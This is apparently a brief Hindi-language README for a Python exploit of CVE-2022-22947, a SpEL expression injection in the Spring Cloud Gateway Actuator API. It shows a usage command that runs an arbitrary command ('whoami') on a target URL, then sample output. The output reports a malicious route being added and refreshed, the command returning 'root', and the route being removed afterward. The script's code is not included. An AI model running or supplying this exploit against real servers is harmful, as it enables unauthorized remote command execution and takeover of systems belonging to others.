
Spring Cloud Gateway Actuator API SpEL अभिव्यक्ति इंजेक्शन कमांड निष्पादन Exp
Spring Cloud Gateway Actuator API SpEL एक्सप्रेशन इंजेक्शन कमांड निष्पादन Exp
उपयोग:python3 CVE-2022-22947.py -u "http://127.0.0.1:8080" -c "whoami" परिणाम: दुर्भावनापूर्ण SpEL एक्सप्रेशन रूट सफलतापूर्वक जोड़ा गया! रूट रीफ्रेश सफल! हमले का परिणाम सफलतापूर्वक प्राप्त हुआ:
================================================ root
================================================ दुर्भावनापूर्ण रूट हटा दिया गया! रूट रीफ्रेश सफल!